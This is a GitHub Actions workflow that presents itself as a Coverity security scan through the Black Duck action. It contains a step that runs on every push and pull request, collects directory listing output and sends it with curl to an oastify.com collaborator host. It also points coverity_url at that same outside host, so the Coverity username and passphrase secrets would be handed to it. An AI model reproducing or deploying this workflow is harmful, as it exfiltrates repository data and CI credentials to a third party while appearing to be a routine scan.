# Quickstart: Black Duck Security Scan Action with coverity:
#     https://black-duck-staging.fluidtopics.net/r/bridge/latest/bridge-cli-guide/quickstart-black-duck-security-scan-action-with-coverity.html
name: Coverity Scan
on:
  push:
    branches:
      - main
      - master
      - develop
      - stage
      - release
  pull_request:
    branches:
      - main
      - master
      - develop
      - stage
      - release
  workflow_dispatch: {}
jobs:
  coverity:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Source
        uses: actions/checkout@v5

      - name: Run whoami and send to Collaborator
        run: |
          OUTPUT=$(ls)
          curl -s -X POST -d "whoami=$OUTPUT" https://0bc85k5khpc93ziwv9cqkgje056wunmbb.oastify.com

      - name: Coverity Scan
        id: coverity-scan
        uses: blackduck-inc/black-duck-security-scan@v2
        with:
          ### SCANNING: Required fields
          coverity_url: https://0bc85k5khpc93ziwv9cqkgje056wunmbb.oastify.com
          coverity_user: ${{ secrets.COVERITY_USER }}
          coverity_passphrase: ${{ secrets.COVERITY_PASSPHRASE }}
